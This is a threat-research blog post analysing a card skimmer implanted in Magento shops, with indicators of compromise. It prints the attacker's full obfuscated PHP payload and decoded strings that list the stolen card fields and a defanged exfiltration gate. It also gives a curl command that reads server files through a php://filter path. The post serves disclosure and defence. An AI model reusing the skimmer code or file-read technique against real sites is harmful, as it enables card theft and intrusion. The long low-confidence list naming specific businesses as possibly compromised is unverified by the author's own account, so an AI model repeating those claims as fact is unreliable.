If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

Disclaimer

National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

Analysis

Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.%5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands to an external gate hosted on *****.]com. This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZGRGQvMEhoTU45R2lyR2k2SmZIYjAwdG5mbzZVdmg0MVZPUDBqU1Nia1dWTXpkK2ZZWXpzZkh3d1ZzSHh4N2ZPWEgwMi9mdkhidjNkT2E3cUJwVXhMYmY3aThjbjMvL2p1ZDA1WExyRE1qVmk2c3pHaGlLM1NmL1B2dm03d2N2SngrODl3UngyUnRUWHRQRzhidGk2NVdsbTRmdkg1cSs5SDdhRjArUC84VG40U042Z0NaN2I2N1I3cFZPTjZ6VGxTUDNNdGRLNnk1OUtVSjhyV05kL3c4L3Z6ait3OHloOTdQSTU5T3gyRGdSbTd1OWtraDV4cVZ1bVpjaHpFbEtXZHVLQTN5NWc4d2RPbjEyN3RuN1pUcnpqR3FraFhuSXhQQXNDSkx5SFVHeDNQbTI4eUVWTDMwcG9vRjdGTlIxMUZUbmRPUTZBMGxuZTl1ZTl0WTkyOXVhUzNDSlNzb3R1bWgrZU51VDRpT1NsRXVqUzRwbTNwWUxJUVRibC82NGR2bUhIOGF1Ly9SK3pzVU40YVZMYis4c0NTTSttNXUrOFdqcTZ0djNiL3M4T2hKT1RFNWRpQVprQklQQjZLNWsvcVNRdUJoNjYvcS9tUDdwMm92bjd6L3FQZzBjY1U1NDh0d0N2enZrYkJ5OU9IWDc3STFiYXpvaDNRZEM2OEZKdUhFOVhZeWNGL3N2SG52NTZ2VC80Qi8xeWd4ZEdmSTlYeDQ5Zm01eC9QM2N2cVpwdEhZdnFzcWhDYkhyd2FYeE4rZmZ2K244eSs4V1o4WHE2OCttRDVCdU81czY5alIxckxxYWJobWpxaWEvOGJhOGVEbjU1SmU1eDQrTHc2RGx0MWJkLzgzTmwrTjA3Ymc0OWdBSFJFcHhaSzJ0ZEQxeDllQS8zNzY2SUhaNjBMWFd0dWQzRC96KzRPUmp1alFWK3dwSXNNWkdNdURFNHBHZjZYcVI3K1BRNVY5MS9qTDE0dURTdjVmNDlLNElVV3NkRHd2L2MvQVdzQzc0ZE9Ld29PQWh4Ly9BbUhjRCtNMzhTN0ZUNE1DS0w2TzVWczVJOHJnczFQcG9GRnlBUjUwWHJBNnY3Nmc1UkZtckE4QVF5cDFJRUdhZVE5bWFiSWpid3h0ams2OW15a1R3djBQaTZYT0hyajljNElyeVdGN0Rlb3VQWnVrMmtjTDRpS0RBWFhxdGJXL0dYejJoRzBPb1Y3djhwOWhZQkowVmF1S0RkYTRlK2k0SjNmeldGZW9aR2gweDZnUFRLTmVBajNUUkJtQWNzSFcwVm12cXFQLzB4Q3hkUFhMNkhtcXM3ZVlOTVlGYTlmV0xsQXJQaWUwQ3JsYUFkak54Z2dLWk9kUXdJbDJZS01UNW9KaFhVMzQrRFMzRGRZN0lOTzhROHhFemxSRXlHUWhoeXhVZHdHak9NSkkwUUZoYlJISERDVWJEMDRMUkFraFhxQmxPVmp5VjAyS093NXppSkpaSXIwM3M1c25YNUhCTFJ3OElXaHhKS3dodDFkTVozaGQ2VldCcUlPbDYwejRxY2FuR2FtbnZXcHZXL0RjbmY3eExkNkdja3NCZk10Nk5INStjdm5veXNsbDM2SnVVckcyTHRaVlY3M2VzdHY2bU5vT2VMNS9yODVWc1FHSEkyb3gyc1VDOFJ4OHYxNk9SMWFzaE5heWQrSHA2QXFnWm9zdkQyUWtlUHQ0Sjd3bzB4S1dtSHI4eVIxODdlZmdFTzBDOXFZMS82ZFBEZWQrcVVEWXpSdGxPM0x3aWo0UTVyZmZrQStKS1hNWWlIWlNNQVZkZlc4OHVuN3FIK2s3Vy91Smo2cEpPWm9WajgzYVBHVWxMV24zc0kydmk3dlhMQldoSW1RU2pPOTErZXhOZC9LRHRXUytIZytqMVFrRTVyRlJjOU93VThaSEtPdkI5eDBXVFRaVUpiMnF0aENzWmRyNTRRMkNpci9EVEJqRkhjVVJnMFJTUG1RenJkR3EzY3huMHNrNVNUTFhzdFBoV2lac3lCdk0wdHpGVENaT1BNNmljb3VPb2xTRytna0c1VXVUbFRoYk5wT2dGOEpEVzQyWXE1b2daQzNvaFY1ZlE4QmNQVXBSUXhVVmVMM1Ztd3pTcDNvNDRGeFdreHlTaldVVXBXM1Y4dk1MYkp6R3NwZ0d3TjlIT1pZdGZxS01yTUwvVWhwWitlVGpsTU9obWMwME5MM3Ryb1hSWmxlV3c3MTBlU1FWOTRPS0x1YVhmNy9QcjhpcGZZMGtuMHZqL2ZlODJwdz09JykpKTs=

We are now facing an initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “touch” which would activate the process in both flavors: GET and POST. Once the activation variable is found a compressed and encoded payload is fitted into a multiple variable concatenation chain and later executed (eval).

Fig2: Payload Stage 1

By following the reverse obfuscation order chain we will end-up in having the following code (Fig3). This time the attacker used more obfuscation techniques: from charset differentiation, junk code to spear random comments making quite hard the overall reading. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset I was able to extract the decoding loop and to quickly understand the Payload behavior

Fig3: Payload Stage 3

Indeed, once the script decodes the received payload (by rotating on charsets with hard-coded strings) from the compromised eCommerce (Fig3 decodes touch variable content), every stolen field is ordered into a crafted object and is sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section would help us to understand the execution chain.

REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;

We actually have one more host that need to be analyzed. By taking a closer look to the used domain, we might agree that it looks like the ending proxy gate which stores data on a given database (mongodb). Again by enumerating and seeking inside its public information it was actually possible to spot and to enumerate the used technology to store the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory – used to store temporary files between the attacker infrastructure – I was able to build up a simple monitoring script which revealed the most used compromised eCommerce.

Attack Magnitude

From the command and control host we might observe what is actually passing through it, but we might have no idea about the overall magnitude of the infection chain since many eCommerces could have a low selling rate (rate of customers during my monitoring phase). In this case even if they are compromised, it is very hard to discover every compromised eCommerce by using this technique: looking, converting and importing temporary files generated every time a data leak happens (every time a user adds his credit card). So we might ending up with another method. Fortunately the host reserved a PTR (Pointer Record) to mo-------.]fvds].ru as shown on Fig4.

Fig4: PTR on ^^^^^^.su

The new host (mo-------) definitely recall the mag^^^^^^.]su registered email address (mo------@protonmail.]com) in an unique way. BTW It is active since 2019-07!!

Fig5: registered eMail Address

According to URLSCAN, using the PTR record in order to understand how many known websites have links pointing to mo-----.]fvds.]ru, you might find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce. Now, I am not saying that every single eCommerce in the list has been compromised, but taking randomly 3 of them (and reported in IoC section) I found the exact infection chain on each one. So potentially every eCommerce on that list (so that points to the command and control) should be checked.

Fig6: Link on m——–fvds.]ru

According to urlscan.io most of the websites pointing to momo--------s.]ru respect the following geographic distribution (Fig7). Most of all are US based followed by RU, NL and IN. While it’s hard to say that it is a targeted attack against US eCommerce websites, stats (Fig7) are surprisingly talkative.

Fig7: Location of Possible Compromised eCommerce

IoC

The following IoC have been extracted from Command and Control as described in the Analysis section. I do have evidences that those eCommerce send credit card numbers to magesouce but I did not analysed every single eCommerce outside the “High Confidentially”, which could be compromised using different infection chains. More potentially compromised eCommerce site could be found, a nice unverified list (“Low Confidentially”) follows.

High Confidentiality Compromised :

– (POST): https://*****/js/ar/ar2497.php
– Sha256 (ar2497.php): 7a04ef8eba6e72e3e21ba9da5e1ac99e4f9022fae19dc9c794d87e4aadba1db4
– mom*****@protonmail.]com (email used to register c2)
– ——.]com (rely)
https://^^^^^^^^^.]su/gate/proxy (c2)
– mom*****.]fvds].ru (PTR)
http://www.]startinglineproducts.]com
– shop.sobelathome.]com
– shop.princessluxurybed.]com
http://www.nclhome.]com
http://www.shoprednose.]com.]au
http://www.plusmedical.]com.]au
http://www.selariadias.]com.]br
– owners.clubwyndhamstore.]com
http://www.assokappa.]it
http://www.shogunlivraria.]com.]br
http://www.broadtickets.]com
http://www.broadticket.]com
http://www.siamflorist.]com
http://www.castmemberlinen.]com
– bumperworksonline.]com
http://www.stixx.]com.]br
http://www.worldmarkbywyndhamstore.]com
– tknwthunderdome.]com
http://www.silknaturals.]com

Low Confidentiality Compromised (more investigation is needed):
URL: https://mo——.]fvds.]ru/
URL: http://hotelcathedrale.]be/
URL: https://mag^^^^^^^^.]su/
URL: http://www.]americanlighter.]com/
URL: http://www.]turyagatea.]com/
URL: http://www.]dysin.]com/
URL: http://hotelcathedrale.]be/
URL: https://magesource.]su/
URL: http://demolicaomoveis.]com.]br/
URL: http://www.]zamarimarcondes.]com.]br/
URL: https://www.]chirobuddy.]net/
URL: http://hotelcathedrale.]be/
URL: http://flagandsymbol.]com/
URL: http://english-furniture.]co.]uk/
URL: https://shop.]horoskoper.]net/
URL: https://myphonetics.]com/
URL: https://magesource.]su/saturn/login
URL: http://hotelcathedrale.]be/
URL: http://www.]almosauto.]in/
URL: http://chappalwalla.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://www.]vintageindiarishikesh.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]doreall.]com/
URL: https://prawnman.]com.]au/
URL: http://www.]autocleaningbrunssum.]nl/
URL: https://www.]paudicesrl.]it/
URL: http://www.]pejenterprisesinc.]com/
URL: http://luxuryjewelleryto.]com/
URL: http://okj.]in/
URL: http://hotelcathedrale.]be/
URL: http://aquasport.]sigmacell.]in/
URL: https://www.]xinginroo.]com/
URL: http://dhyanaa.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: https://www.]arenaflorist.]com/
URL: https://prawnman.]com.]au/
URL: http://www.]officecorrect.]com/36-6.%5Dhtml
URL: http://hotelcathedrale.]be/
URL: https://medik8.]bg/
URL: https://www.]denimvenim.]com/
URL: http://flagandsymbol.]com/
URL: https://www.]theaugustco.]com/
URL: http://www.]sportlowcost.]it/
URL: https://www.]sunrisewholesaleinc.]com/
URL: http://www.]fashionaxe.]com/
URL: https://shop.]horoskoper.]net/
URL: http://chappalwalla.]com/
URL: https://gorusticx.]com/
URL: http://www.]vintageindiarishikesh.]com/
URL: http://www.]tribalasia.]com.]my/
URL: http://hotelcathedrale.]be/
URL: https://magesource.]su/mage.%5Djs
URL: https://magesource.]su/
URL: https://magesource.]su/
URL: https://magesource.]su/
URL: https://magesource.]su/
URL: http://yugen-studio.]com/
URL: https://www.]prostraps.]com/
URL: http://fetchscripts.]com/
URL: http://de-lices.]ru/
URL: http://www.]doreall.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: https://magesource.]su/
URL: https://magesource.]su/
URL: http://aquasport.]sigmacell.]in/
URL: http://www.]americanlighter.]com/
URL: http://oomph.]com.]sg/
URL: https://magesource.]su/
URL: http://pharmatrades.]com/
URL: http://www.]onirico.]it/
URL: http://luxuryjewelleryto.]com/
URL: https://commercialpoolandspasupplies.]com/
URL: http://montecitocaviar.]com/
URL: http://fashionbagsshoes.]com/
URL: http://www.]nuestranuevaweb.]com/
URL: http://prolineglobal.]com/
URL: http://trueitglobal.]com/
URL: http://www.]opticaloutlet.]ca/
URL: https://dload.]com.]br/
URL: https://www.]xinginroo.]com/
URL: http://fashionfromla.]com/
